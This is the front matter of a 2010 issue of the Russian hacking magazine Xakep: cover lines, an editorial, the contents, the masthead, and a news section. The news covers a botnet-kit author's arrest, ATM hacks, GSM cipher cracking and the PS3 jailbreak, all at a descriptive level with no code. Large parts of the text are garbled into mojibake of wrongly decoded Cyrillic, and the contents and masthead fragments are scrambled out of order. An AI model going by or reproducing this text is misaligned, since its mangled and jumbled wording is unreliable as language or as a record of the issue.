СТР.

48

Я

x 10 (ОКТЯБРЬ) 2010

А
НН
ВА р.
ДО 210
ЕН :
М НА
КО ЦЕ
РЕ

ТУЛКИТ ДЛЯ СОЦИАЛЬНОЙ ИНЖЕНЕРИИ

ОКТЯБРЬ 10 (141) 2010

НОКАУТ ДЛЯ AOL/ РУТОВЫЕ ПРИВИЛЕГИИ НА СЕРВЕРЕ КОРПОРАЦИИ AOL

ÍÎÊÀÓÒ
ÄËß AOL

CALLBACK:
ÝÊÎÍÎÌÈß
ÍÀ ÑÂßÇÈ
ÑÒÐ. 34

ÐÓÒÎÂÛÅ
ÏÐÈÂÈËÅÃÈÈ
ÍÀ ÑÅÐÂÅÐÅ
ÊÎÐÏÎÐÀÖÈÈ AOL
ÑÒÐ. 66

141

METASPLOIT FRAMEWORK
ÂÅÁ-ÊÀÌÅÐÀ
ÍÀ ÑÅÐÂÎÏÐÈÂÎÄÀÕ
ÊÐÓÃÎÂÀß ÎÁÎÐÎÍÀ LINUX
ÄÅÑÊÒÎÏÀ
ÂÑÊÐÛÂÀÅÌ ÕÈÒÐÛÉ SALITY.AA
ÂÛÁÈÐÀÅÌ ËÅÃÊÎÂÅÑÍÎÅ
VPN-ÐÅØÅÍÈÅ

ÍÀØÈ
ÍÀ HITB
ÊÎÍÔÅÐÅÍÖÈß
HACK IN THE BOX
ÎÒ ÏÅÐÂÎÃÎ ËÈÖÀ
ÑÒÐ. 54

*

INTRO

В прошлом месяце мы со Степом и Пандой Горл ездили
на Chaos Constructions: впервые за время проведения
этого мероприятия. Не подумай, что у нас появился
большой интерес к демосцене — причиной поездки
стала весьма солидная секция презентаций по ITбезопасности, которую представляли, в том числе, трое
наших авторов: Алексей Синцов, Дмитрий Евтеев и
Владимир Воронцов. На CC вообще в этом году собралась
большая тусовка увлеченных ИБ людей, а многие из
спикеров могли бы отлично выступить на уровне больших
международных конференций.
В общем, поездка была супер: послушали отличные

презентации и суперски попили пива. А самое главное:
появилось ощущение, что усилиями организаторов CC в
России появляется большая, интересная конфа, которая
способна в будущем мутировать во что-то уровня если не
Defcon и BlackHat, то, по крайней мере, HITB :).
nikitozz,
гл. ред. Х
udalite.livejournal.com
http://vkontakte.ru/club10933209
* Что это за штука? Все просто — это «живая 3D метка», которую
специально для нашего журнала сделала компания EligoVision.
Заценить ее очень просто: возьми с нашего DVD либо по
адресу www.xakep.ru/3dmarkers/ программу под Windows
или Linux, поднеси журнал к своей web-камере и ты увидишь,
как журнальная страница оживет и на месте метки появится
забавная трехмерная анимация.
Узнать больше о компании EligoVision и скачать другие 3d-метки
можно на сайте www.eligovision.ru.

TrueCrypt и EncFS Выбираем простое и легковесное VPN-решение ÊÎÄÈÍà 108 Êîäèì íà Python ïî-ôóíêöèîíàëüíîìó 112 WTF WCF? 116 Ñàìîïàëüíûé MSN-êëèåíò íà ñèøàðïå 119 Ïðîãðàììåðñêèå òèïñû è òðèêñû Познаем силу функциональной парадигмы программирования Windows Communication Foundation: сложные транзакционные системы по-быстрому Готовим почву для создания антиамериканского IM-спамера Спецвыпуск: трюки для (не очень) начинающих системщиков SYN/ACK 122 «Æèâîé» áýêàï ëèíóêñîâîãî ñåðâåðà 126 ×òî íîâîãî â AD CS? 130 Ðèñêè ñèñòåìíîãî àäìèíèñòðàòîðà SET — лучший набор гениального хакера Мировые достижения элитного взлома Ïàðàëëåëè IT-áèçíåñà Обзор средств для резервного копирования и создания LiveDVD/LiveUSB Certificate Services в Windows Server 2008 R2 vs. не входящих в ванильное ядро Круговая оборона Linux десктопа Шифруем диски с помощью LUKS/dm-crypt. или приятная доза адреналина? Большой FAQ 8. Avast. отравляющие жизнь.5 Гб всякой всячины Удобные web-сервисы .CONTENT MegaNews ÑÖÅÍÀ 004 080 Все новое за последний месяц FERRUM 016 Íîóòáóê-áàìáóê 018 Ìåäèàïëååðû BBK 020 Ïàìÿòêà äëÿ AMD Обзор ноутбука ASUS U43Jc Обзор линейки HD-плееров Тест памяти DDR3 PC_ZONE 025 Êîëîíêà ðåäàòîðà 026 Âèçóàëüíûé ïðîãðàììèíã 030 Âåá-êàìåðà íà ñåðâîïðèâîäàõ 034 Ñáåðå÷ü òåëåôîííûé áàëàíñ Что может рассказать реестр? Конструируем приложения с помощью HiAsm Совмещаем простой код и железо с помощью Arduino Поднимаем систему обратного дозвона Callback ÂÇËÎÌ 038 Easy-Hack 042 Îáçîð ýêñïëîèòîâ 048 Ñîöèàëüíàÿ ðåàëüíîñòü 054 Íàøè íà HITB 060 Ëàáîðàòîðíûé ïðàêòèêóì ïî Metasploit Framework 066 Íîêàóò äëÿ AOL 070 X-Tools Хакерские секреты простых вещей Разбираем свежие уязвимости Скрытые фишки MSF Получаем привилегии рута на сервере корпорации AOL Программы для взлома MALWARE 072 Êðàø-òåñò àíòèâèðóñîâ: òðîéíàÿ ïåíåòðàöèÿ 076 ][-ïðåïàðàöèÿ: âñêðûâàåì õèòðûé Sality. фобии и их вариации: эмоции. Windows Sеrver 2003 Семь и еще один способ подвести сисадмина под монастырь ÞÍÈÒÛ 134 PSYCHO: Áîÿòüñÿ íåëüçÿ èãíîðèðîâàòü 140 FAQ UNITED 143 Äèñêî 144 WWW2 Страхи. Avira: проверим их на стрессоустойчивость Учимся распознавать полиморфизм и обфускацию кода на примере известного вируса История компании Parallels ÞÍÈÊÑÎÉÄ 086 Òåðìîÿäåðíûé ñèíòåç 092 Ïëþñ 100 ê çàùèòå 098 Îñîáåííîñòè íàöèîíàëüíîé êîíñïèðàöèè 103 Ñàìûé ìàëåíüêèé VPN Обзор патчей для Linux.aa Nod32.

Klouniz» Лозовский (alexander@real.: 8 (800) 200.ru) /ОТДЕЛ РЕАЛИЗАЦИИ СПЕЦПРОЕКТОВ >Директор Александр Коренфельд (korenfeld@gameland.xakep. Ìíåíèå ðåäàêöèè íå îáÿçàòåëüíî ñîâïàäàåò ñ ìíåíèåì àâòîðîâ.ru) >Старший менеджер Светлана Пинчук >Менеджеры Надежда Гончарова Наталья Мистюкова >Директор группы спецпроектов Арсений Ашомко (ashomko@gameland. факс: (495) 780-8824 >Директор группы GAMES & DIGITAL Евгения Горячева (goryacheva@gameland. Òèðàæ 100 000 ýêçåìïëÿðîâ.xakep.ru) > Претензии и дополнительная инфа: В случае возникновения вопросов по качеству вложенных дисков . Тимура Фрунзе.ru Леонид Боголюбов (xa@real.ru) >Âûïóñêàþùèé ðåäàêòîð Николай«gorl»Андреев (gorlum@real. РФ. факс: (495) 780-8824 >Директор по Дистрибуции Кошелева Татьяна (kosheleva@gameland.ru) >Редактор Unix-раздела Антон «Ant» Жуков >Монтаж видео Максим Трубицын /PUBLISHING >Ó÷ðåäèòåëü ÎÎÎ «Ãåéì Ëýíä».ru) >Ëèòåðàòóðíûй ðåäàêòîð Юлия Адасинская >Редактор xakep.ru) UNIXOIDи PSYCHO Àíäðåé «Andrushock» Ìàòâååâ (andrushock@real.: +7 (495) 935-7034 Факс: +7 (495) 780-8824 >Генеральный дèðåêòîð Äìèòðèé Àãàðóíов >Óïðàâëÿþùèé äèðåêòîð Äàâèä Øîñòàê >Äèðåêòîð ïî ðàçâèòèþ Ïàøà Ðîìàíîâñêèé >Äèðåêòîð ïî ïåðñîíàëó Татьяна Гудебская >Ôèíàíñîâûé äèðåêòîð Анастасия Леонова >Редакционный директор Дмитрий Ладыженский >PR-менеджер Наталья Литвиновская >Директор по маркетингу Дмитрий Плющев >Главный дизайнер Энди Тернбулл >Директор по производству Сергей Кучерявый /ÐÅÊËÀÌÀ / Тел. ìîãóò áûòü ïðèâëå÷åíû ê îòâåòñòâåííîñòè.xakep. Ìîñêâà. Îòïå÷àòàíî â òèïîãðàôèè «Lietuvas Rivas». 11. Õàêåð Çàðåãèñòðèðîâàíî â Ìèíèñòåðñòâå Ðîññèéñêîé Ôåäåðàöèè ïî äåëàì ïå÷àòè.ru. òåëåðàäèîâåùàíèþ è ñðåäñòâàì ìàññîâûõ êîììóíèêàöèé ÏÈ ß 77-11802 îò 14 ôåâðàëÿ 2002 ã.ru © ÎÎÎ «Ãåéì Ëýíä». Ðåäàêöèÿ â ýòèõ ñëó÷àÿõ îòâåòñòâåííîñòè íå íåñåò.999 Áåñïëàòíî äëÿ çâîíÿùèõ èç Ðîññèè > Äëя писем 101000.ru) ÊÎÄÈÍÃ. èñïîëüçóþùèå äàííóþ èíôîðìàöèþ â ïðîòèâîçàêîííûõ öåëÿõ. По вопросам лицензирования и получения прав на использование редакционных материалов журнала обращайтесь по адресу: content@gameland.ru) >Руководитель отдела подписки Гончарова Марина (goncharova@gameland. Ëèöà.пишите по адресу: claim@gameland.066 Íîêàóò äëÿ AOL Мировые достижения элитного взлома 030 Âåá-êàìåðà íà ñåðâîïðèâîäàõ Совмещаем простой код и железо с помощью Arduino 108 054 Êîäèì íà Python ïî-ôóíêöèîíàëüíîìó Познаем силу функциональной парадигмы программирования Íàøè íà HITB Мировые достижения элитного взлома /ÐÅÄÀÊÖÈЯ >Ãëàâíûé ðåäàêòîð Íèêèòà «nikitozz» Êèñëèöèí (nikitoz@real. 2010 . à/ÿ 652. Öåíà äîãîâîðíàÿ.xakep.ru) /DVD >Выпускающий редактор Степан «Step» Ильин (step@real.ru) >Руководитель спецраспространения Лукичева Наталья (lukicheva@gameland.: (495) 935-4034. Ðåäàêöèÿ óâåäîìëÿåò: âñå ìàòåðèàëû â íîìåðå ïðåäîñòàâëÿþòñÿ êàê èíôîðìàöèÿ ê ðàçìûøëåíèþ. стр.ru) >Ðåäàêòîðû ðóáðèê ÂÇËÎÌ Дмитрий«Forb» Докучаев (forb@real.: (495) 935-7034. MALWARE и SYN/ACK Александр «Dr.xakep. Москва.ru) >Работа с рекламными агентствами Лидия Стрекнева (strekneva@gameland.ru) >Старший трафик-менеджер Марья Алексеева (alekseeva@gameland. ул.ru) >Верстальщик Вера Светлых (svetlyh@gameland. 44-45 Тел.ru) PC_ZONE и UNITS Степан «step» Ильин (step@real.xakep. Ãëàâïî÷òàìò. 119021.xakep.e@gameland. Ðåäàêöèÿ íå íåñåò îòâåòñòâåííîñòè çà ñîäåðæàíèå ðåêëàìíûõ îáúÿâëåíèé â íîìåðå. Литва.ru) >Менеджеры Александр Гурьяшкин Светлана Мюллер Татьяна Яковлева /РАСПРОСТРАНЕНИЕ: / Тел.ru) >Менеджеры Ольга Емельянцева Мария Нестерова Мария Николаенко >Менеджер по продаже Gameland TV Марина Румянцева (rumyantseva@gameland. > Ãîðячая ëèíèя ïî ïîäïèñêå òåë.ru) /ART >Àðò-äèðåêòîð Евгений Новиков (novikov.3. Çà ïåðåïå÷àòêó íàøèõ ìàòåðèàëîâ áåç ñïðîñà — ïðåñëåäóåì.xakep. д.

фактически.11n. словно по волшебству. перепрошивки. который сейчас вынужден скрывать свое местонахождение. Джулиану Эссенджу. Один из способов решения этой задачки — адаптер по имени Netgear Universal WiFi Internet Adapter (WNCE2001). в свою очередь. ÇËÎÊËÞ×ÅÍÈß WIKILEAKS После того. Разумеется. что они появились в очень «интересное время». Эта «шайтан-коробка» позволит тебе вместо Ethernet-кабеля использовать Wi-Fi 802. как скандально известный сайт WikiLeaks опубликовал на своих страницах файлы так называемого «афганского досье» (десятки тысяч секретных военных документов. а ордер был официально отозван. что на имя Эссенджа выдан ордер. чтобы за считанные минуты «подружить» технику с беспроводной сетью. эти ребята действительно радеют за свободу информации.MEGANEWS МАРИЯ «MIFRILL» НЕФЕДОВА MARIA.RU MEGANEWS ÎÁÎ ÂÑÅÌ ÇÀ ÏÎÑ ËÅÄÍÈÉ ÌÅÑßÖ ÏÐÅÂÐÀÙÀÅÌ ETHERNET  WI-FI Буйство технологического прогресса на глазах набирает обороты. скажем. прислав e-mail в редакцию газеты Dagens Nyheter. и нам все чаще приходится сталкиваться с ситуациями. а. поддерживающим технологию Wi-Fi Protected Setup (роутеры без WPS с адаптером тоже скрестить можно. Согласись. действительно не помешает поддержка (если «пираты» пройдут в парламент. Джулиан дистанционно опроверг эти обвинения. Не нужны ему и диски с драйверами — благодаря технологии Netgear Push ‘N’ Connect подключение происходит как процедура plug-and-play. Плюсов у гаджета от Netgear несколько. когда к Сети нужно подключить вовсе не комп. WNCE2001 поддерживает практически любые девайсы с интерфейсом Ethernet на борту и моментально «найдет общий язык» с роутером. например. «пиратам» тоже нужен пиар :). телевизор. прекрасно работая и от USB. 004 XÀÊÅÐ 10 /141/ 10 . Ó÷åíûå èç Ëàáîðàòîðèè çðèòåëüíîé ýðãîíîìèêè ÑØÀ âûÿñíèëè.NEFEDOVA@GLC. Ну и. Поддержку Эссенджу. И тут же. просто это отнимет чуть больше времени). Но как подружить технику с Wi-Fi? Обычно с этим возникают проблемы: начинается шаманство с бубнами. шведы сняли с него подозрения. Зачем это нужно Пиратской партии? В Швеции скоро выборы в парламент. ему. Основателя WikiLeaks обвинили в изнасиловании и сексуальных домогательствах. а также заметил. втыкать кабель в каждый девайс в доме накладно. гарантирована поддержка на уровне властей Швеции) — не успел он закончить дела в Швеции и покинуть страну. как власти объявили. На прилавках магазинов адаптер появится уже этой осенью по цене порядка 2000 рублей. матюки и прочие «радости». медиаплеер или консоль. решила оказать незабвенная Пиратская партия Швеции. неудобно и неспортивно. сам ресурс и его создатель Джулиан Эссенж сильно мешают жить властям США. рассказывающих о реальной ситуации в Афганистане). а также пообещали посильную помощь в отражении юридических нападок. он не требует дополнительного питания. конечно. Эти отчаянные люди предложили приютить на своем хостинге серверы WikiLeaks. ÷òî øðèôò Verdana íàèáîëåå áåçîïàñåí äëÿ çðåíèÿ.

.

взламывая свой смартфон. все упиралось лишь в деньги — Butterfly продавался (и продается) в Сети по цене $500–1. и даже заблокировать девайс и стереть с него информацию. что это первый арест непосредственно автора набора вредоносных программ. Ñâÿòî ìåñòî ïóñòî íå áûâàåò — ïîÿâèëñÿ ïåðâûé SMS-òðîÿí ïîä Android OS. как Mariposa. который продал ему лом.MEGANEWS ËÅÃÀËÈÇÀÖÈß ÄÆÅÉËÁÐÅÉÊÈÍÃÀ È ÍÅ ÒÎËÜÊÎ В США есть одна интересная «традиция» — каждые три года Бюро по авторским правам США (The U. при условии. что Jailbreak для iPhone теперь легален. недовольно напоминает.взлом софта. . Apple будет вправе собрать информацию о юзере. под благовидным предлогом — это не что иное. которые никто не крал. заюзать его мог почти каждый. совершающих «подозрительные действия» со своими аппаратами. так как для его использования не нужно было быть «кулхацкером» и обладать специальными навыками или глубокими познаниями. что Jailbreak и отвязка от оператора попадают под категорию «подозрительных действий» чуть ли не в первую очередь.300.FakePlayer. Американские власти неожиданно признали легальными следующие вещи: . и тысячи вредоносных программ. Делается все это. Представители ФБР подчеркивают. так как джейлбрейкинг может привести к самым разным «нестабильностям» в работе аппарата. краткосрочного использования материала для создания новых работ. В этом году как раз состоялось очередное рассмотрение. По сути. и даже взлом защиты DVD может быть ненаказуем.программы. компания подала заявку на получение нового патента. в свою очередь. И вот из Штатов пришла удивительная новость: ФБР сообщило. Пока идет следствие. . который в будущем позволит им отслеживать несанкционированных пользователей. залоченный под определенную сеть. какие именно обвинения будут предъявлены Iserdo. ÍÀÉÄÅÍ È ÀÐÅÑÒÎÂÀÍ ÀÂÒÎÐ «ÁÀÁÎ×ÊÈ» Инструментарий «Бабочка» (Butterfly) — штука широко известная в узких кругах. Copyright Office) при Библиотеке Конгресса рассматривает и одобряет исключения из федерального закона. Парня арестовали в Мариборе вместе с еще двумя подозреваемыми. мы арестовали того типа. а также в общеобразовательных целях. Apple. в другой сети.программы. e-mail или голосовой почты). официально не разрешенный к использованию оператором или производителем телефона. Однако и обычным джейлбрейкнутым аппаратам. за которые Apple не отвечает. . при условии легального. Зафиксировав «подозрительные действия».обход защиты от копирования DVD-дисков. и гордо сообщают: «Вместо чело- 006 века. Таким образом получается. ты все равно лишаешь его гарантии. и какое наказание ему грозит. который вломился в ваш дом. что такие девайсы вышли из обращения или более не производятся. На основе «Бабочки» были созданы сотни ботнетов. Тулкит сумел стать одним из популярнейших в своем роде. как защита гаджетов от кражи (предусмотрено даже уведомление владельца аппарата посредством SMS. а самого автора злосчастного инструментария — 23-летнего хакера Iserdo (его имя пока не разглашается). защищенного аппаратным ключом.S. что им совместно с полицией Словении и Испании удалось найти и задержать не очередного оператора Butterfly-ботнета. что. позволяющие использовать телефон.AndroidOS. и были приняты новые поправки к закону о защите прав в цифровую эпоху. критики или комментирования. может не поздоровиться — дело в том. и на данный момент он отпущен под залог. конечно. подробную карту местности и описание самых богатых домов в округе».взлом защиты игр (DRM) в целях поиска уязвимостей. Более того. Èíôåêöèÿ ïîëó÷èëà îáîçíà÷åíèå Trojan-SMS. . и неизвестно. включая такие гигантские зомби-сетки. XÀÊÅÐ 10 /141/ 10 . определить местонахождение устройства (и самого пользователя). запрещающего обход технических средств защиты от неавторизованного использования. позволяющие запускать на телефоне софт.

.

Провозившись с машинами больше года. как понятно из названия. до сих пор официально недоступных в России. Цена читалок. начинающийся со строки «EIOWJE». Но где-то уменьшилось. Джек Барнаби.. $200 ÎÐÈÃÈÍÀËÜÍÛÉ ÏÎÄÕÎÄ Ê ÂÇËÎÌÓ ÁÀÍÊÎÌÀÒΠНа недавно состоявшейся в Лас-Вегасе конференции Black Hat было много интересных докладов и выступлений. что Tranax закрыли «дырку» в новых ATM. Похоже. а вот Tranax Technologies хранит подозрительное молчание. То есть. либо нажатием определенной комбинации кнопок.500 электронных книжек). которую троянец дешифровал и принимался исполнять. После указанной строчки в профайле шла зашифрованная инструкция. «работает» по банкам Бразилии и Латинской Америки.. чтобы угнаться за Nook. ощутимо снизилась и теперь составляет $139 за модификацию с Wi-Fi и $189 за 3G + Wi-Fi модель. Габариты обеих моделей 008 теперь равны 190x122x8 мм. а вес составляет 241 грамм. ïîäíÿâøåé ïèðàòñêèå ñåðâåðû äëÿ èãðû WoW. в свою очередь. для использования которой написал эксплойт Dillinger.MEGANEWS ÓÏÐÀÂËÅÍÈÅ ÒÐÎßÍÎÌ ×ÅÐÅÇ ÑÎÖÈÀËÜÍÓÞ ÑÅÒÜ Чего только не придумают хакеры и вирусмейкеры. узнать о которых ему удалось. êîìïàíèÿ Blizzard îòñóäèëà ó àìåðèêàíêè Ýëèñîí Ðèâç. в профиль которого в виде обычного текста были загружены зашифрованные инструкции для зловреда. а скорость перелистывания страниц улучшилась на 20%. Для управления трояном в «социалке» был создал фейковый аккаунт по имени «Ana Maria». а вот уже установленные машины обновить до сих пор не соизволили. ìëí. буквально разобрав их по винтику и собрав обратно. ÍÎÂÛÉ KINDLE — ÌÅÍÜØÅ. Моделей всего две: Kindle Wi-Fi и Kindle 3G + Wi-Fi. Сильные изменения претерпели и корпуса девайсов. С помощью телефонного модема и Dillinger можно получить полный доступ к системе без необходимости ввода пароля. ÁÛÑÒÐÅÅ Amazon в очередной раз обновил свои электронные книжки: вслед за новым Kindle DX вышли и обычные Kindle третьего поколения. В аппарате Tranax Technologies Барнаби обнаружил критическую уязвимость удаленного доступа. В банкомат Triton.. что материнская плата Triton оказалась защищена стандартным (не уникальным) ключом. Amazon гордо сообщает. а масса — на 17%. удалось внедрить бэкдор Scrooge (тоже написанный самим Барнаби). купив с аукциона два банкомата компаний Tranax Technologies и Triton в личное пользование. теперь он равен 4 Гб (то есть. «инфекция» лезла в социальную сеть и искала там профиль. Вызвать «к жизни» внедренный и надежно спрятанный от «глаз» операционной системы бэкдор можно либо специальной картой. Çà êàæäîãî èç èãðîêîâ æåíùèíó îøòðàôîâàëè íà . XÀÊÅÐ 10 /141/ 10 . Увы.5 427. Информацию о найденных уязвимостях Барнаби заблаговременно передал производителям банкоматов. сумел выделиться даже на этом фоне. что их контрастность на целых 50% превосходит контрастность других ебуков (контраст стал 10:1 вместо старых 6:1). Дело в том. И это уже далеко не первый случай. Изучая троян из семейства «Brazilian Banker». Не обошли вниманием и софтверную составляющую: теперь Kindle комплектуются улучшенным просмотрщиком документов PDF и новым экспериментальным браузером на основе движка WebKit. Чего только не сделаешь. который исследователь спокойно купил в Сети за 10 баксов. но специалист по сетевой безопасности. компания Triton быстро приняла меры. В качестве админки вредоносная софтина использовала социальную сеть (какую именно. который. чтобы облегчить жизнь себе и усложнить ее другим.393 Àñòðîíîìè÷åñêóþ ñóììó. Электронные книжки заметно похудели — толщина уменьшилась на 21%. что управляется малварь нетривиальным способом. когда вредоносный софт использует социальные сети или иные популярные сервисы в качестве «командного пункта». но в приведенных скриншотах многие опознали Orkut). на читалку войдет порядка 3. хакер нашел два новых способа извлечь из них заветные зеленые бумажки. а где-то и приросло — вырос объем встроенной памяти. На Black Hat Барнаби поведал о новых способах взлома банкоматов. $88. теперь представленные в графитовом цвете. в открытый доступ свои наработки он выкладывать не стал. заразив машину пользователя. поэтому о методах взлома говорить можно лишь с его слов. а также экраны не бликуют и порадуют юзеров более четкими и темными шрифтами. ËÅÃ×Å. Обе модификации получили новые 6-дюймовые дисплеи с разрешением 600x800 пикселей. названо не было. специалисты из RSA’s FraudAction Research Lab обнаружили.

ru X-testing сontest Журнал Хакер представляет конкурс по поиску багов в бета-версии IBM Lotus Symphony 3.>> coding lotus.xakep. Дальше все зависит от тебя: чем больше и интересней ошибки ты найдешь. тем больше у тебя шансы выиграть крутые призы! .xakep.ru. что нужно для участия в конкурсе — установить Lotus Symphony Beta 3 и зарегистрироваться на сайте lotus. Покажи себя в деле — и выиграй поездку в США на конференцию Lotusphere в январе 2011 года! Все.

которую разработчики не предоставляют. равно как и AirProbe. 010 XÀÊÅÐ 10 /141/ 10 . способную взломать алгоритм шифрования A5/1. но в Сети курсируют слухи. вскрыв алгоритм шифрования RC4. что взлом A5/1 был возможен и ранее. не дают.500) прототип перехватчика разговоров в GSM-сетях. а там. какой именно эксплойт использует PS Jailbreak. ÇÀÙÈÒÀ PS3 ÏÀËÀ Интересные новости для геймеров — команды сайтов psx-scene. Но. что несколько лет назад происходило с Wi-Fi-сетями — тогда почти все стали пытались взломать соседский Wi-Fi. Впрочем. что и на недавно состоявшейся конференции Defcon тоже был показан недорогой (около $1. возглавляемой норвежским программистом Фрэнком Стивенсоном. Разработчики «Кракена» объясняют. где можно приобрести заветный чип. представляющему собой USB-донгл. Для фактической прослушки чужих переговоров. данные почти моментально уничтожались. Крис Пагет. использующийся в Skype.7 Тб. но все это уже не отменит того факта.com и ozmodchips. в торрентах). что Kraken.com рапортуют. Ногл рассказал. который. так как неизвестно. напоминаем. судя по всему. И никакого тебе медленного и мучительного удаления данных и. что работает это только на debug-версии PS3. чтобы даже в случае банального отключения питания компьютера или при изъятии из него жесткого диска. Новая система будет реализована на накопителях Toshiba с поддержкой аппаратного шифрования данных (Self-Encrypting Drive. это аналогично тому. уж тем более. Сегодня позволь рассказать тебе о группе независимых разработчиков открытого ПО. Опровергнуть или подтвердить этот слух пока никто не может. Она держалась три года! Почти историческое событие :).MEGANEWS GSM-ÑÅÒÈ ÎÏÓÒÀË «ÊÐÀÊÅÍ» В прошлом номере мы писали об умельцах. но этот процесс был весьма долог. Факт взлома доподлинно подтвержден парнями из PSX Scene (на их сайте есть видео). и восточные братья выпустят в продажу готовые наборы. не желая попасть под суд. не ровен час. стирается. Но никаких сверхтребований к аппаратной части нет. и воспользоваться им. Автор устройства. SED). тем самым обманывая телефон и принуждая его «поделиться» информацией об активном звонке. которыми шифруются SMS и переговоры. выпустив обновление прошивки. прямо на конференции продемонстрировал работу девайса и объяснил принцип его работы: перехватчик маскируется под обычную вышку-ретранслятор сети оператора AT&T. Цена донгла пока «кусается»: в среднем она составляет $130 за штуку. что с GSM произойдет то же самое». чип подешевеет. позволяющую записывать и раскодировать переговоры и SMS. и на модчип образовалась очередь. у него уходит от 30 секунд до пары минут. заявлена поддержка FAT. приобрести которые можно будет за символическую плату в онлайн-магазинах (подобными китами для Wi-Fi-сетей приторговывают давно). а скорость в работе криптографического софта решает все. Новая система автоматического удаления данных с жестких дисков получила говорящее название Wipe («уничтожение». и у него появятся клоны. не нужно учинять над HDD физической расправы. Êîìïàíèÿ BitDefender ñ ãðóñòüþ ñîîáùàåò. когда Kraken доработан. Теперь. Никаких гарантий разработчики. и в случае какого-либо ЧП ключ шифрования. Наверняка в скором времени Sony закроет эту уязвимость. что их ПО полностью работоспособно. и утилиту AirProbe.и SLIM-версий и всех регионов. В ходе конференции Black Hat эти ребята представили миру свои наработки — систему Kraken.com. опять же. конечно. тем не менее. я надеюсь. любой. а также принять участие в его доработке и улучшении может практически каждый. Как это работает? Просто и изящно: информация на HDD хранится в зашифрованном виде. Kraken работает с радужными таблицами общим объемом 1. Основная фишка Wipe в том. генерируется самим «винтом». ÀÍÍÈÃÈËßÒÎÐ ÄÀÍÍÛÕ ÎÒ TOSHIBA Компания Toshiba поведала миру о своей новой разработке в области защиты информации. что ее можно настроить таким образом. которые наделали много шума. что защиту PS3 сумели взломать. «стирание»). понадобится еще и «железная» составляющая. стало возможно создавать дампы игр. на сайте psjailbreak. анонсированных чуть ранее. Принимающий участие в проекте криптограф Карстен Нол заявил: «Ситуация вокруг GSM-хакинга сейчас входит в стадию скрип-киддисов. ÷òî ó 75% ïîëüçîâàòåëåé ïàðîëü îò ïî÷òîâîãî ÿùèêà ñîâïàäàåò ñ ïàðîëåì ê àêêàóíòàì â ñîöèàëüíûõ ñåòÿõ. загружать бекапы со встроенного жесткого диска и устанавливать на консоль пиратское ПО. это не останавливает покупателей — у многих дистрибьюторов уже разобрали весь запас. спокойно лежит в открытом доступе. которые доступны в Сети в открытом доступе (в частности. Интересно. на подбор ключей. что достаточно купить программируемый радио-модуль для ПК и взять на вооружение Kraken с криптографическими таблицами и Airprobe. Дело в том. используемый в большинстве GSM-сетей. купить все нужное может. В случае с Wi-Fi шифрование сменили на WPA и. хоть и утверждают. Благодаря девайсу PS Jailbreak. что защита PlayStation 3 наконец-то дала серьезную трещину.

Все когда-то начиналось с продажи лицензионной музыки. как для видео. В результате получается экономить не только время на вылазку в магазин. Заплатить за них можно любым удобным способом — СМСкой. увесистого дистрибутива Starcraft II и сразу приступать к его прохождению. позволяющие скачать лишь 5-10%. Это легко понять: в Сети игры стоят дешевле в среднем на 20-30 процентов. с той лишь разницей от обычных коробочек. но еще и ощутимые деньги на покупке. через любую платежную систему. Ребята из немецко-русской компании Digital Solutions реализовали такую фишку для игр. две. стало возможным продавать еще и видео. где можно достать любую новинку (хотя и часто фигово поломанную). когда в последний раз покупали диски. что начать пользовать игрой можно.playfast. Дальше. Если канал достаточно широк. чем диски в магазинах. когда скорости соединения подросли. позволяющий резать игру на части и сжимать большие объемы данных при передаче. но отсюда же скачивать сами игры. включая любимые народом терминалы. чтобы порубиться в дополнение Starcraft непременно понадобился бы диск с игрой. но и работает со всеми крупными российскими издателями и представителями зарубежных производителей. Еще каких-то десять лет назад. Бестолковые онлайн-магазины сменились удобными сервисами вроде Apple. ты получишь стартовый «пирог» и начнешь играть можно уже через несколько минут.TV. К тому же перед покупкой любую гамесу можно полноценно пощупать. какую часть дистрибутива залить на твой компьютер. в то время как ты уже давно играешь. Это полностью лицензионные игрушки. поскольку издатель не тратится на производство дисков и доставку в магазины. чтобы дальнейшая закачка проходила незаметно и без тормозов. Каталог постоянно растет. Пока стянешь тяжелую игру (а это легко может занять 8-10 часов).. Мастер ставит только самое необходимое. Увы. но вместо муторного ожидания конца установки. Ты начинаешь ставить винду. получаешь вполне работоспособную систему уже через несколько минут. А сейчас? Слово «мегабит» так прочно обосновалось в нашей жизни.. чтобы начать игру. позволяющие удобно купить. Вот ведь как бывает. идея пока фантастическая. скажем. чтобы быстро скачать 8 Гб дистрибутив свежей новинки. В результате экспериментов.PLAY FAST. Это основной момент. добавляя в себя все больше и больше новинок. Плавная дозагрузка — фирменная фишка системы: в зависимости от «толщины» интернет-канала PlayFast рассчитает. Удобные сервисы Steam и Xbox Live Marketplace.. которые предлагаю разработчики на своем сайте. Прогрессивная технология покупки игр Представь себе ситуацию. Что это значит? Очень просто: уже сейчас появляются в электронном виде быстрее. максимум удобства. При этом опять не надо полностью скачивать их себе на компьютер: закачиваются и устанавливаются лишь небольшие части. Продавцы игр также не стояли в стороне: вместо того. 011 . Большая часть игры докачивается незаметно в фоновом режиме. распространяемого через технологию PlayFast. Появились технологии. чем в магазине. скачав небольшую часть общего объема. В инете стало не только комфортно играть в мультиплеер. пять — да хоть всю подборку сразу. необходимые для того. чтобы бежать в магазин многие геймеры стали приобретать игры прямо в Интернете. Такие технологичные штуки мы любим :). Главная фишка в том. установить любую экшн или стратегию. Минимум ожидания. по мере необходимости. Играли в основном по локалке: для битв онлайн серьезной преградой становились большие задержки и узкий канал. По объему это не больше демки или видео с рецензией. Но то запад. пропадет всякое желание в нее играть. а потом поиграть с другими людьми быстро стали обыденным делом для десятков миллионов человек. позволяющими подкачивать видео прямо во время просмотра: картинка в HD-качестве в потоковом режиме — это сверхудобно. у нас же — каналы пока не такие широкие. что мы уже стали забывать. Что приятно: в среднем игрушка стоит на 20-30 процентов дешевле. Игры в PlayFast не варез. скачать. Ребята из Digital Solutions нашли выход. а все остальное инсталлит в фоне.ru). был создан механизм PlayFast (www. никак не мешая геймплею. XÀÊÅÐ 10 /141/ 10 Вот если бы добавить сюда «потоковое вещание». Одну. Компания не только создала саму технологию. И речь тут даже не о пресловутых torrent’ах. ИЛИ LEVEL UP ДЛЯ ИГРУШЕК На нашем DVD ты найдешь пример дистрибутива игры. но это лишь для операционок. что распространяются через прогрессивный механизм закачки.

